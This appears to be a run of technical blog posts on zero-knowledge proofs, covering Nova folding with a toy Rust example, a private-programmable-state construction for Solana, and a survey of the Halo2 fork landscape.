fn vec_add(a: &[u128], b: &[u128]) -> Vec<u128> {
    a.iter().zip(b.iter()).map(|(x, y)| add(*x, *y)).collect()
}
fn vec_scale(a: &[u128], s: u128) -> Vec<u128> {
    a.iter().map(|x| mul(*x, s)).collect()
}
// Toy "commitment": rolling hash. A real Nova uses Pedersen commitments.
fn commit(v: &[u128]) -> u128 {
    let mut h: u128 = 0xCAFE_BABE_DEAD_BEEF;
    for x in v {
        h = h.wrapping_mul(0x100000001b3).wrapping_add(*x);
    }
    h % MODULUS
}

/// Fold two relaxed R1CS instances into one, using random challenge r.
/// Returns the folded instance and the cross-term T (which the prover
/// sends to the verifier in a real protocol).
fn fold(
    inst1: &RelaxedR1CS,
    inst2: &RelaxedR1CS,
    r: u128,
) -> (RelaxedR1CS, Vec<u128>) {
    // Cross term T. In real Nova: T = Az_1 o Bz_2 + Az_2 o Bz_1
    //                                 - u_1 * C z_2 - u_2 * C z_1.
    // Toy: just a placeholder of the right shape.
    let len = inst1.e.len();
    let cross_term: Vec<u128> = (0..len)
        .map(|i| {
            let t1 = mul(inst1.u, inst2.z.get(i).copied().unwrap_or(0));
            let t2 = mul(inst2.u, inst1.z.get(i).copied().unwrap_or(0));
            add(t1, t2)
        })
        .collect();

    // Folded slack scalar: u = u_1 + r * u_2
    let u = add(inst1.u, mul(r, inst2.u));
    // Folded witness: z = z_1 + r * z_2
    let z = vec_add(&inst1.z, &vec_scale(&inst2.z, r));
    // Folded error: e = e_1 + r * T + r^2 * e_2
    let r2 = mul(r, r);
    let e = vec_add(
        &vec_add(&inst1.e, &vec_scale(&cross_term, r)),
        &vec_scale(&inst2.e, r2),
    );
    let folded = RelaxedR1CS {
        u,
        com_z: commit(&z),
        com_e: commit(&e),
        z,
        e,
    };
    (folded, cross_term)
}

fn fresh_instance(z: Vec<u128>) -> RelaxedR1CS {
    let e = vec![0u128; z.len()];
    let com_z = commit(&z);
    let com_e = commit(&e);
    RelaxedR1CS { u: 1, z, e, com_z, com_e }
}

fn main() {
    // Step 0: fresh instance with witness z_0.
    let acc = fresh_instance(vec![3, 5, 7, 11]);
    println!("step 0: u={}, |z|={}, com_z={:#x}", acc.u, acc.z.len(), acc.com_z);

    // Step 1: fold in a fresh R1CS instance from running F at step 1.
    let step1 = fresh_instance(vec![13, 17, 19, 23]);
    let r1: u128 = 0xDEADBEEF; // Fiat-Shamir challenge in real protocol
    let (acc, _t) = fold(&acc, &step1, r1);
    println!("step 1: u={}, com_z={:#x}, |e|={}", acc.u, acc.com_z, acc.e.len());

    // Step 2: fold in another step.
    let step2 = fresh_instance(vec![29, 31, 37, 41]);
    let r2: u128 = 0xFEEDFACE;
    let (acc, _t) = fold(&acc, &step2, r2);
    println!("step 2: u={}, com_z={:#x}", acc.u, acc.com_z);

    // After T steps, the final accumulator is one relaxed R1CS instance.
    // The protocol proves it's satisfying via a single SNARK at the end.
    println!("\\nfinal accumulator captures all 3 steps in one instance.");
    println!("a SNARK proves this instance is satisfying — 1 proof for any T.");
}
`}
</RustPlayground>

The shape is the thing. The fold is just three linear combinations: $u' = u_1 + r u_2$, $\mathbf{z}' = \mathbf{z}_1 + r \mathbf{z}_2$, $\mathbf{e}' = \mathbf{e}_1 + r \mathbf{T} + r^2 \mathbf{e}_2$. The cross-term $\mathbf{T}$ is what the prover sends; the challenge $r$ is Fiat-Shamir over the transcript. In real Nova the witness $\mathbf{z}$ is replaced by a Pedersen commitment to it (so the verifier never sees the witness), and the error vector $\mathbf{e}$ is replaced by a commitment as well. The linear structure of the fold is preserved by the additive-homomorphic property of the Pedersen commitment, which is the entire reason Pedersen is the right primitive here.

<Aside kind="warn">
The toy above does NOT have soundness. The "commitment" is a rolling hash, not a Pedersen commitment, so an adversary can trivially forge the folded instance. The challenge $r$ is hardcoded, not Fiat-Shamir. Use [microsoft/Nova](https://github.com/microsoft/Nova) or [argumentcomputer/arecibo](https://github.com/argumentcomputer/arecibo) for production. The skeleton is for understanding the linear-combination shape, not for use.
</Aside>

## Where this lands for ZERA

The honest answer about recursion in [zera-sdk](/blog/zera_sdk_scaffolding/) v1: we don't use it. A privacy transfer is one Groth16 proof per spend, and there's nothing to recurse over. The advantage of recursion shows up when:

- You're settling many transfers in a batch (rollup shape) and want to compress them into one proof.
- You're running a zkVM (Lurk, Jolt, RISC0) where the program has many uniform steps.
- You're building a light client that has to verify a long chain of proofs cheaply.

For ZERA's transfer flow, none of these apply. For the eventual settlement layer that sits *underneath* a chain of ZERA transfers (think: a state-root proof every epoch), Nova-style folding is the right shape, and the design seam is in `crates/zera-sdk-core/src/recursion.rs`. Empty file today. We've left the door open.

The reason I wrote this post anyway is that recursion is the part of the ZK stack that's most actively moving in 2026. HyperNova landed at CRYPTO 2024 with a CCS-based unification of R1CS / AIR / Plonkish that was supposed to take five more years. The next two years are going to compress IVC primitives down to "one folding scheme, three commitment choices, pick your poison." Anyone deploying a ZK system today should know what shape that compressed primitive will be, because the migration cost will be the difference between a clean refactor and a rewrite.

## Further reading

- [Halo: Recursive Proof Composition without a Trusted Setup](https://eprint.iacr.org/2019/1021) — Bowe, Grigg, Hopwood (2019) — the accumulation-scheme paper.
- [Nova: Recursive Zero-Knowledge Arguments from Folding Schemes](https://eprint.iacr.org/2021/370) — Kothapalli, Setty, Tzialla (CRYPTO 2022) — the folding-scheme paper.
- [SuperNova: Proving universal machine executions without universal circuits](https://eprint.iacr.org/2022/1758) — Kothapalli, Setty (2022) — the per-instruction folding extension.
- [HyperNova: Recursive Arguments for Customizable Constraint Systems](https://eprint.iacr.org/2023/573) — Kothapalli, Setty (CRYPTO 2024) — CCS-based unification.
- [microsoft/Nova](https://github.com/microsoft/Nova) — the canonical Rust implementation.
- [Halo2 book](https://zcash.github.io/halo2/) — the production deployment behind Zcash NU5.
- [Poseidon, by hand and by code](/blog/poseidon_by_hand_and_by_code/) — the hash function inside the recursion circuit.
- [Why BN254, and when to switch off it](/blog/why_bn254_and_when_to_switch/) — the curve choice underneath the SNARK that closes the recursion.


---

# PPST: extending SPST to arbitrary private computation

Canonical: https://blog.skill-issue.dev/blog/ppst_private_programmable_state/
Description: F_RP Construction II. Generalises SPST to private programmable state: arbitrary arithmetic circuits over committed pre/post-state, with R1CS-embedded program execution and atomic PPST-SPST composition.
Published: 2026-05-02T15:00:00.000Z
Tags: zk, cryptography, circuits, r1cs, aleo, aztec, phd


import { Mermaid, TradeoffTable, Aside, Quote } from "@/components/mdx";

[SPST](/blog/spst_self_paying_shielded_transactions/) gave us private value transfer with self-paying fees on a smart-contract chain. That's the Solana analogue of Zcash's Sapling — and exactly what every existing relayer-dependent privacy mixer (Tornado, RAILGUN, Light v1) does, just without the relayer.

But Tornado-style protocols are not the goal. The goal is **Turing-complete** private computation: a Solana program that runs on encrypted state and produces a proof of correct execution without leaking what the state was, what the inputs were, or what the program output. That's PPST.

This is post 4 of 11 in the [relayerless-privacy](/series/relayerless-privacy) series. Reading [post 3](/blog/spst_self_paying_shielded_transactions/) first will help, but the construction here stands alone.

<Aside kind="note">
The closest analogues in production are **Aleo** (UTXO-based private programs in Leo) and **Aztec** (note-based private functions in Noir running in the PXE). PPST sits in the same design space but adapts the model to deployment as a smart-contract layer on Solana — no separate L1, no separate L2 sequencer.
</Aside>

## What "private program" means here

**Definition (Private Program).** A *private program* is an arithmetic circuit

$$
C : \mathbb{F}_p^{n_{\mathsf{in}}} \to \mathbb{F}_p^{n_{\mathsf{out}}}
$$

over the BN254 scalar field, specified by an R1CS constraint system $(A, B, C)$ of size $N_C$. Each program is identified by

$$
\mathsf{program\_id} \;=\; \mathsf{Poseidon}(\mathsf{vk}_C),
$$

where $\mathsf{vk}_C$ is the Groth16 verification key. The program identifier is a **public, deterministic commitment to the program's logic**.

**Definition (Private State).** A vector $\mathsf{state} \in \mathbb{F}_p^k$ committed as

$$
\mathsf{cm}_{\mathsf{state}} \;=\; \mathsf{Poseidon}(\mathsf{state}[0], \ldots, \mathsf{state}[k-1], r_{\mathsf{state}}).
$$

State commitments are leaves in a state Merkle tree $\mathcal{T}_S$ of depth 32, root $\mathsf{rt}_S$. This is a separate tree from the SPST note-commitment tree.

**Definition (State Transition).** A triple $(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}, \mathsf{state}_{\mathsf{post}})$ where $\mathsf{aux}$ is private auxiliary input and

$$
C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) \;=\; \mathsf{state}_{\mathsf{post}}.
$$

The transition consumes $\mathsf{cm}_{\mathsf{pre}}$ via nullification and produces $\mathsf{cm}_{\mathsf{post}}$ as a new tree leaf. **The program logic $C$ is never revealed to the verifier — only $\mathsf{program\_id}$ is.**

## The PPST relation

The relation $\mathcal{R}_{\mathsf{PPST}}$ is the set of $(x, w)$ pairs:

**Public instance** $x = \bigl(\mathsf{rt}_{\mathsf{pre}}, \mathsf{rt}_{\mathsf{post}}, \mathsf{nf}_{\mathsf{state}}, \mathsf{cm}_{\mathsf{post}}, \mathsf{program\_id}, f\bigr)$.

**Private witness** $w = \bigl(\mathsf{state}_{\mathsf{pre}}, r_{\mathsf{pre}}, \mathsf{path}_{\mathsf{pre}}, sk_{\mathsf{state}}, \mathsf{aux}, \mathsf{state}_{\mathsf{post}}, r_{\mathsf{post}}, \mathsf{vk}_C\bigr)$.

Nine constraints, all enforced by the outer PPST circuit:

| # | Name | Constraint |
|---|------|-----------|
| P1 | Program identification | $\mathsf{program\_id} = \mathsf{Poseidon}(\mathsf{vk}_C)$ |
| P2 | Pre-state commitment | $\mathsf{cm}_{\mathsf{pre}} = \mathsf{Poseidon}(\mathsf{state}_{\mathsf{pre}}, r_{\mathsf{pre}})$ |
| P3 | Pre-state membership | $\mathsf{MerkleVerify}(\mathsf{rt}_{\mathsf{pre}}, \mathsf{cm}_{\mathsf{pre}}, \mathsf{path}_{\mathsf{pre}}) = 1$ |
| P4 | State nullification | $\mathsf{nf}_{\mathsf{state}} = \mathsf{PRF}_{sk_{\mathsf{state}}}(\mathsf{cm}_{\mathsf{pre}})$ |
| **P5** | **Program execution** | $C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) = \mathsf{state}_{\mathsf{post}}$ |
| P6 | Post-state commitment | $\mathsf{cm}_{\mathsf{post}} = \mathsf{Poseidon}(\mathsf{state}_{\mathsf{post}}, r_{\mathsf{post}})$ |
| P7 | Post-state tree update | $\mathsf{rt}_{\mathsf{post}} = \mathsf{MerkleInsert}(\mathsf{rt}_{\mathsf{pre}}, \mathsf{cm}_{\mathsf{post}})$ |
| P8 | Fee extraction | value-bearing state OR companion SPST |
| P9 | State authorization | $\mathsf{pk}_{\mathsf{state}} = \mathsf{PRF}_{sk_{\mathsf{state}}}(0)$ embedded in pre-state |

P5 is the heart of the construction. The user-defined program $C$ — written in Circom, Noir, Leo, or any high-level circuit DSL — is **embedded as a sub-circuit** inside the outer PPST relation. The R1CS for $C$ becomes constraints inside the R1CS for $\mathcal{R}_{\mathsf{PPST}}$.

## How the program embedding works

<Mermaid id="ppst-embedding" code={`graph LR
  A[High-level program<br/>private fn swap{a,b}<br/>in Noir/Leo/Circom] --> B[Compiler]
  B --> C[R1CS for C<br/>~10K-1M constraints]
  C --> D[Merge into PPST circuit<br/>R1CS<sub>PPST</sub> = R1CS<sub>overhead</sub> + R1CS<sub>C</sub>]
  D --> E[Groth16.Setup<br/>per-program ceremony]
  E --> F[vk_C → on-chain PDA<br/>at addr_C = PDA{H{vk_C}}]
  classDef step stroke:#4ade80,stroke-width:2px,fill:#0a0a0a,color:#fff
  class A,B,C,D,E,F step
`}/>

The outer circuit sizes look like:

$$
N_{\mathsf{PPST}} \;\approx\; N_{\mathsf{overhead}} \;+\; N_C
$$

where $N_{\mathsf{overhead}} \approx 25{,}000$ R1CS constraints (Merkle paths, commitment hashes, PRF evaluations — see SPST §3.1.6) and $N_C$ is the program circuit size.

| Program complexity | $N_C$ | Total PPST | Groth16 prove (M2) |
|--------------------|-------|------------|---------------------|
| **Simple** (token transfer, vote, ACL) | 10³ — 10⁴ | 35,000 — 50,000 | 1 — 3 s |
| **Moderate** (private AMM swap, auction bid, credential) | 10⁵ — 10⁶ | 125,000 — 10⁶ | 5 — 60 s |
| **Complex** (private ML inference, DB queries) | > 10⁷ | impractical for direct Groth16 | minutes — hours |

Complex programs need IVC. PPST extends naturally: decompose the computation into $T$ uniform steps each running $C_{\mathsf{step}}$, fold them with Nova or SuperNova, then wrap the final accumulator in a Groth16 decider proof. **The on-chain verifier always sees a constant-size 128-byte proof regardless of $T$.** Off-chain proving is $O(T \cdot |C_{\mathsf{step}}|)$ but the chain doesn't care.

## Theorem 3.6 — PPST soundness

**Statement.** If Groth16 is knowledge-sound and Poseidon is collision-resistant, no PPT adversary can cause the PPST verifier to accept a transaction corresponding to an invalid state transition (one where $C(\mathsf{state}_{\mathsf{pre}}, \mathsf{aux}) \neq \mathsf{state}_{\mathsf{post}}$) except with negligible probability.

**Proof sketch.** Suppose $\mathcal{A}$ produces a valid PPST transaction whose underlying transition is invalid. By Groth16 knowledge soundness, the extractor $\mathcal{E}$ recovers a witness $w^*$ satisfying constraints P1–P9 — including P5: $C(\mathsf{state}^*_{\mathsf{pre}}, \mathsf{aux}^*) = \mathsf{state}^*_{\mathsf{post}}$. Direct contradiction. ∎

**Corollary (State Integrity).** The state tree $\mathcal{T}_S$ maintains the invariant that every leaf is a commitment to a state that resulted from a valid execution of an authorized program starting from a previously valid state. By induction on accepted transactions, this invariant holds at all times.

## Theorem 3.7 — PPST zero-knowledge

**Statement.** PPST reveals nothing about $\mathsf{state}_{\mathsf{pre}}$, $\mathsf{state}_{\mathsf{post}}$, $\mathsf{aux}$, or the internal logic of $C$ beyond the public outputs.

**Proof sketch.** Direct from perfect ZK of Groth16. The simulator $\mathcal{S}$ depends only on the public instance $x$, not on the witness. For any two valid witnesses $w_0, w_1$ consistent with the same $x$, the proof distributions are identical.

What does leak:
- **`program_id`** is intentionally public. It identifies which program executed so the verifier can pick the right verification key. *Full function privacy* (hiding the program identity) requires a universal circuit or a commitment-to-vk argument and is left as a future extension.
- The fact that *some* state transition occurred under that program.
- The fee $f$.

What does not leak:
- The specific state values.
- The auxiliary inputs.
- Which specific leaf in $\mathcal{T}_S$ was consumed.

## Theorem 3.8 — PPST-SPST composability

This is the magic. PPST and SPST compose into a single atomic transaction: **execute a private program AND transfer shielded value, in one ZK proof.**

Construct the composite relation $\mathcal{R}_{\mathsf{PPST+SPST}} = \mathcal{R}_{\mathsf{PPST}} \wedge \mathcal{R}_{\mathsf{SPST}}$ with a *linking constraint*:

$$
\mathsf{link} \;=\; \mathsf{Poseidon}(\mathsf{nf}_{\mathsf{state}}, \mathsf{nf}_1, \ldots, \mathsf{nf}_n)
$$

binding the PPST state nullifier to the SPST input nullifiers. Both sub-proofs reference the same `link` value as a public input.

Cross-constraint (Value Mediation): if the program outputs a transfer amount $\Delta v$, the SPST component enforces

$$
\sum_i v^{(\mathsf{SPST})}_{\mathsf{in},i} \;=\; \sum_j v^{(\mathsf{SPST})}_{\mathsf{out},j} \;+\; f \;+\; \Delta v_{\mathsf{to\_program}}.
$$

That is — value flowing from the SPST shielded pool *into* the program's state (or out of it) is reconciled inside the proof. An observer cannot tell whether the program consumed value, produced value, or merely transferred it.

**Practical realisation.** For a moderate program ($N_C \sim 50{,}000$):

$$
N_{\mathsf{comp}} = N_{\mathsf{PPST}} + N_{\mathsf{SPST}} + N_{\mathsf{link}} \;\approx\; (50{,}000 + 25{,}000) + 24{,}000 + 400 \;\approx\; 100{,}000 \text{ constraints}.
$$

Groth16 prover time on commodity hardware: 5–10 seconds. **Single 128-byte proof on-chain.** ~200,000 CU verification cost on Solana.

## Comparison with Aleo and Aztec

<TradeoffTable rows={[
  { aspect: 'PPST (this work)',
    pros: 'Composes with SPST atomically; deployable as Solana smart-contract layer; relayer-free; 128-byte Groth16 proof',
    cons: 'program_id leaks (no function privacy); per-program Groth16 ceremony; complex programs need IVC' },
  { aspect: 'Aleo records model (ZEXE)',
    pros: 'Universal Marlin/Varuna SRS; native L1 chain with prover marketplace; relayer-free',
    cons: 'Requires its own L1; program ID also visible; delegated proving leaks witness' },
  { aspect: 'Aztec PXE + AVM',
    pros: 'Universal PLONK/Honk SRS; Noir DSL; client-side proving; relayer-free via FPCs',
    cons: 'L2 rollup architecture (separate sequencer); function call boundary L→public visible' },
]}/>

The thing PPST gets that Aleo and Aztec don't is **deployment as a protocol layer on a high-performance Layer-1**. Aleo and Aztec each require running their own consensus or sequencer. PPST runs as a Solana program on the same validators as Jupiter and Helium — inheriting Solana's TPS, finality, and infrastructure.

## What's left

PPST plus SPST gives us private value + private computation. That's two of the three privacy properties. The remaining gap is **submitter anonymity**: even with a perfect ZK proof, the wrapping Solana transaction is signed by an Ed25519 key whose public key is on-chain. Address graph analysis trivially links the "private" transaction to the submitter's identity.

The next post is about closing that gap — without a relayer, without a mixing service, and without a separate L1.

## Bibliography

- Bowe, S., Chiesa, A., Green, M., Miers, I., Mishra, P., Wu, H. (2020). *ZEXE: Enabling Decentralized Private Computation.* IEEE S&P 2020.
- Chiesa, A., Hu, Y., Maller, M., Mishra, P., Vesely, N., Ward, N. (2020). *Marlin: Preprocessing zkSNARKs with Universal and Updatable SRS.* EUROCRYPT 2020. https://eprint.iacr.org/2019/1047
- Aztec Network. *Client-side Proof Generation.* https://aztec.network/blog/client-side-proof-generation
- Kothapalli, A., Setty, S., Tzialla, I. (2022). *Nova: Recursive Zero-Knowledge Arguments from Folding Schemes.* https://eprint.iacr.org/2021/370
- Noir Language Documentation. https://noir-lang.org/docs/

Previous: [SPST: self-paying shielded transactions ←](/blog/spst_self_paying_shielded_transactions/) · Next: [TAB: threshold-anonymous broadcast →](/blog/tab_threshold_anonymous_broadcast/)


---

# Halo2 in 2026: what changed since the Zcash era

Canonical: https://blog.skill-issue.dev/blog/halo2_in_2026_what_changed/
Description: A survey of the Halo2 ecosystem six years after the Zcash team published it — what stayed the same (PLONKish, lookups, IPA), what evolved (KZG, gadget libraries, fork landscape), and what we ship today.
Published: 2026-05-01T15:30:00.000Z
Tags: halo2, plonk, zcash, kzg, lookups, zk, phd


import { Mermaid, RustPlayground, TradeoffTable, Aside, Quote } from "@/components/mdx";

When Zcash open-sourced [Halo2](https://github.com/zcash/halo2) in 2020, it was a research artefact attached to a single deployment target — Zcash's Orchard pool — and a single arithmetisation choice — IPA over the Pasta cycle of curves. Six years later it is a small ecosystem of forks, used by Scroll, Taiko, Axiom, and roughly half the EVM rollups under construction in 2026. The original repository has been in maintenance mode since 2024.

This post is the orientation I wish someone had handed me when I started auditing Halo2 circuits seriously. *What stayed the same?* The arithmetisation. The lookup argument. The mental model of *chips inside regions inside columns*. *What evolved?* The polynomial commitment scheme, the curve choices, the gadget library, and most of all the fork landscape. By the end you should have a defensible answer to "which Halo2 do you mean?" — which is the question every serious ZK conversation in 2026 reduces to within five minutes.

<Aside kind="note">
This is the third post in a [PhD-by-publication track](/about) on production ZK proof systems. It assumes you've at least read the wikipedia page on PLONK; if you want the underlying arithmetic, [Circom, by example](/blog/circom_by_example/) covers R1CS first and Halo2's PLONKish substrate is a generalisation of that.
</Aside>

## What stayed: the PLONKish arithmetisation

The shape of a Halo2 circuit hasn't changed since 2020. You define **columns** — advice (witness), fixed (constants), and instance (public inputs) — and a **rectangular grid** of cells indexed by row and column. The prover assigns values to advice cells; the constraint system asserts polynomial relations on those values, evaluated at every row.

Three families of constraints make up a Halo2 circuit:

1. **Custom gates.** A polynomial identity that must hold on every row, possibly gated by a selector column. `q_mul · (a · b - c) = 0` is the canonical example: when `q_mul = 1`, the constraint forces `a · b = c`; when `q_mul = 0`, the constraint vanishes.
2. **Permutation arguments.** Cells that should be equal across rows or columns are wired into a permutation. This is what gives you "this output of gate A is the input to gate B" without paying the cost of an extra constraint per copy.
3. **Lookup arguments.** A cell must be in some pre-declared table. This is what makes range checks ($x < 2^{16}$) cost ~1 row per check instead of 16, and what makes XOR / S-box / SHA tables tractable inside a SNARK.

The novelty in 2020 wasn't any single one of those — PLONK had given us custom gates and permutations, plookup had given us lookups — but the *combination*, the *user-facing API* (chips, regions, layouters), and the *recursion-friendly proof system* underneath it.

The arithmetisation is so durable that every Halo2 fork in 2026 still uses the same `Circuit` trait, the same `Layouter`, the same `Region`, the same `Selector`. If you wrote a Halo2 chip in 2021, it compiles in 2026 against PSE-Halo2 with one or two trait-bound tweaks. That's an extraordinary track record for a 6-year-old framework.

## What evolved: from IPA to KZG

The original Zcash Halo2 used **IPA** (inner-product argument) over the Pasta cycle of curves (Pallas + Vesta). That choice was deliberate: IPA needs *no trusted setup*, and the Pasta cycle let Zcash do recursion without pairings. Beautiful in theory; expensive in practice. IPA proofs are kilobytes; verification is logarithmic in circuit size and dominated by group operations.

The dominant 2026 fork — Privacy Scaling Explorations' [`privacy-scaling-explorations/halo2`](https://github.com/privacy-scaling-explorations/halo2) — replaced IPA with **KZG** over BN254. The trade-off:

- **You give up:** trustless setup. KZG needs a Powers-of-Tau ceremony.
- **You get:** constant-size proofs (~600 bytes), pairing-based verification that's an order of magnitude cheaper, and Solidity verifier compatibility — which is the single feature that turned Halo2 from "Zcash internal tool" into "the EVM rollup substrate".

This is the trade-off every serious ZK design makes once. (The same trade-off shows up in [Plonky3, the small-fast-cheap revolution](/blog/plonky3_small_fast_cheap/) on a different axis.) Trusted setup is back on the table in 2026 because the Ethereum KZG ceremony — 140,000+ participants — is *good enough* for the threat model most rollups operate under. See [On the death of the trusted setup](/blog/on_the_death_of_the_trusted_setup/) for the argument.

<Mermaid chart={`flowchart TB
  Z[Zcash Halo2 - 2020] --> I[IPA + Pasta curves]
  Z --> P[PLONKish + lookups + chips]
  P --> P1[Custom gates]
  P --> P2[Permutations]
  P --> P3[Lookups]
  Z --> F[Forks 2022-2026]
  F --> PSE[PSE Halo2 - KZG over BN254]
  F --> AX[Axiom fork]
  F --> SCROLL[Scroll fork]
  F --> ZK[zkEVM forks: Taiko, Linea]
  PSE --> SOL[Solidity verifier compat]
  PSE --> M[Maintenance mode Jan 2025]
  AX --> ACTIVE[Active 2026]
  classDef ship fill:#0a4014,stroke:#4ade80,color:#fff
  classDef warn fill:#3a2a0a,stroke:#facc15,color:#fff
  class SOL ship
  class ACTIVE ship
  class M warn`}/>

## The fork landscape in 2026

| Fork | Backend | Status | What it's for |
|---|---|---|---|
| `zcash/halo2` | IPA, Pasta | Maintenance / archival | The reference, where the model originated |
| `privacy-scaling-explorations/halo2` | KZG, BN254 | Maintenance since Jan 2025 | The EVM-compatible workhorse |
| `axiom-crypto/halo2-axiom` | KZG, BN254 | Active | The PSE successor for new features |
| Scroll's `halo2` | KZG, BN254 | Active inside Scroll | zkEVM-tuned, custom gates for EVM ops |
| `appliedzkp/halo2-base` | KZG, BN254 | Active | Higher-level chip-authoring API on top of PSE / Axiom |

The headline event of 2025 was that PSE-Halo2 went into maintenance and the community migrated to Axiom's fork as the upstream for new feature work. Existing deployments did not move — the API surface is identical and PSE-Halo2 still receives security backports — but the energy is on `axiom-crypto/halo2-axiom` and on `halo2-base` for ergonomic chip authoring.

<Aside kind="shipped">
Inside [zera-sdk](/blog/zera_sdk_scaffolding/) we don't ship Halo2 today — the deposit/transfer/withdraw circuits are Circom + Groth16 because of zkey size and Solana's verifier syscall surface. But the off-ramp circuit (where users withdraw to Ethereum) is on PSE-Halo2, because Solidity-verifier support is non-negotiable on the EVM side. We pin to a specific PSE commit and re-vendor it; we do not track main.
</Aside>

## What evolved: gadgets, lookups, and the Lagrange-form witness

Three quieter shifts since 2022 actually changed how circuits are written:

**Gadget libraries got serious.** The original Halo2 shipped with `halo2_gadgets::poseidon` and not much else. By 2026 the [`halo2-base`](https://github.com/axiom-crypto/halo2-lib) and [`halo2-axiom`](https://github.com/axiom-crypto/halo2-axiom) crates ship range checks, ECC, Poseidon, Keccak, RSA, ECDSA, BN254 pairing, and a battery of lookup tables shared across circuits. The "I have to hand-roll a SHA chip" era is over for 90% of use cases.

**Lookups became table-shareable.** Halo2's original lookup design assumed each circuit declared its own tables. With circuits hitting 10 million rows, *table reuse* across sub-circuits became necessary. Both Axiom and PSE landed APIs for declaring a lookup table once and binding it across regions. The constraint-count savings on big circuits are 30–50%.

**Lagrange-form witness committed.** The witness used to be committed in coefficient form, requiring an NTT before commitment. Modern forks commit in *Lagrange* form (point-value), saving an NTT per commitment. On large circuits this is a 15–20% prover-time win — the kind of thing that doesn't show up in marketing copy and matters enormously when you're proving a million constraints.

## A skeleton chip you can read in 30 seconds

Halo2 chips look intimidating. They are not. The shape is: declare the columns you need, declare the constraints in `configure`, and use them in `synthesize`. Below is a contrived multiplier chip — the smallest Halo2 chip that does anything — written against the kind of trait surface every fork shares.

<RustPlayground edition="2024" title="halo2 multiplier chip — sketch">
{`// Sketch of a Halo2 multiplier chip — c = a * b per row.
// Will not compile standalone; depends on halo2_proofs traits.
// Treat as the structural shape, not a runnable program.

use std::marker::PhantomData;

// Stand-in types so the file is self-documenting.
struct Column<T>(PhantomData<T>);
struct Selector;
struct Cell<F>(PhantomData<F>);
trait Field {}

// === The chip's column layout ===
struct MulConfig {
    a: Column<()>,        // advice (witness)
    b: Column<()>,        // advice
    c: Column<()>,        // advice
    q_mul: Selector,      // selector — turns the gate on or off
}

struct MulChip<F: Field> {
    config: MulConfig,
    _marker: PhantomData<F>,
}

impl<F: Field> MulChip<F> {
    // configure() is called once at circuit-definition time. It declares
    // which columns are used and what custom gates fire on which selectors.
    pub fn configure(/* meta: ConstraintSystem<F> */) -> MulConfig {
        // Pseudocode for the constraint system:
        //
        //   meta.create_gate("multiplier", |meta| {
        //       let a = meta.query_advice(a, Rotation::cur());
        //       let b = meta.query_advice(b, Rotation::cur());
        //       let c = meta.query_advice(c, Rotation::cur());
        //       let q = meta.query_selector(q_mul);
        //       vec![ q * (a * b - c) ]
        //   });
        //
        // The vec![] returned must evaluate to 0 on every row where q_mul = 1.
        //
        // That single line — q * (a * b - c) — is the ENTIRE arithmetisation
        // of the multiplier. Permutation arguments handle copy-equality;
        // lookup arguments handle range checks; everything else is layered
        // on top of this primitive.
        unimplemented!("see halo2_proofs::plonk::ConstraintSystem")
    }

    // synthesize() is called once per proof. It assigns concrete values
    // to advice cells.
    pub fn assign_mul(&self, /* layouter, */ a_val: F, b_val: F) -> Cell<F> {
        // Pseudocode:
        //
        //   layouter.assign_region(|| "mul", |mut region| {
        //       self.config.q_mul.enable(&mut region, 0)?;
        //       region.assign_advice(|| "a", self.config.a, 0, || Ok(a_val))?;
        //       region.assign_advice(|| "b", self.config.b, 0, || Ok(b_val))?;
        //       let c_val = a_val * b_val;
        //       region.assign_advice(|| "c", self.config.c, 0, || Ok(c_val))
        //   })
        unimplemented!("see halo2_proofs::circuit::Layouter")
    }
}

fn main() {
    // The shape above generalises to every chip in halo2-axiom and
    // halo2-base. Configure once; assign per proof; gate constraints with
    // selectors so chips can coexist on the same columns.
    println!("see axiom-crypto/halo2-lib for production examples");
}
`}
</RustPlayground>

## The proving-time tradeoff in 2026

<TradeoffTable
  rows={[
    {
      option: "Halo2 (PSE, KZG/BN254)",
      cost: "Powers-of-Tau ceremony required (Ethereum KZG works); ~MB-scale srs",
      latency: "Slower per-shot than Groth16; lookups make constraint-heavy circuits cheap",
      blast_radius: "Maintenance since Jan 2025; security backports only",
      notes: "Default for EVM rollup verifiers; Solidity verifier ships"
    },
    {
      option: "Halo2 (Axiom fork)",
      cost: "Same SRS as PSE; new features land here",
      latency: "Same baseline as PSE; gadget library more complete",
      blast_radius: "Active 2026; the upstream for new circuits",
      notes: "What I'd pick for a greenfield Halo2 deployment in 2026"
    },
    {
      option: "arkworks PLONK",
      cost: "Library, not a DSL; circuits are Rust types",
      latency: "Comparable to Halo2; less optimised gadget library",
      blast_radius: "Research-grade; smaller ecosystem",
      notes: "Where novel proof systems get prototyped"
    },
    {
      option: "Plonky3",
      cost: "STARK/PLONK hybrid; small-field; FRI-based",
      latency: "Fast on consumer hardware due to Mersenne31 / BabyBear",
      blast_radius: "Production at Polygon; growing ecosystem",
      notes: "Pick this when you don't need EVM verification"
    },
  ]}
  caption="Four PLONKish-family proof systems in 2026. Halo2's two forks dominate EVM use; arkworks is where research lives; Plonky3 is where new performance wins are coming from."
/>

## When to actually pick Halo2 in 2026

The honest 2026 answer:

- **Pick Halo2 (Axiom fork) when** your target is the EVM, your circuit is dominated by lookups (range checks, table-driven hash functions, RLC-heavy state-transition circuits), and you want a battle-tested gadget library.
- **Don't pick Halo2 when** your target is a non-EVM L1 (Solana, Aptos) where Solidity verifiers don't help, when your circuit is small (under ~5,000 constraints — Groth16 is faster per shot), or when you need transparent setup (use Plonky3 / RISC0).

## What I'd build differently if I were Halo2 in 2027

Three things, in order of how much I'd actually use them:

1. **Native folding integration.** Halo2's original recursion path (IPA + Pasta cycle) was elegant but slow. A folding scheme — Nova, ProtoStar, HyperNova — bolted onto KZG-Halo2 would unlock zkVMs and batch proving without a rewrite. Several teams are working on this; nothing is in main yet.
2. **A real type system for chips.** `Cell<F>` is structurally typed by row/column position. There's no compile-time guarantee that "this cell holds a u8" or "this cell holds a Boolean" without re-asserting it inside every chip. A phantom-type-driven cell typing would catch a class of audit findings before the auditor ever opens the file.
3. **A standardised lookup-table registry.** Range checks, byte tables, S-box tables — every fork ships its own. A shared `halo2-tables` crate, content-addressed and reusable, would prevent the "every circuit re-declares the same range-16 table" anti-pattern.

I expect (1) within a year and (2)/(3) never. Halo2 is in the *durable* phase of its life — the kind of framework you build *on*, not *into*.

## Further reading

- [The Halo2 Book](https://zcash.github.io/halo2/) — Zcash's canonical guide to the original framework
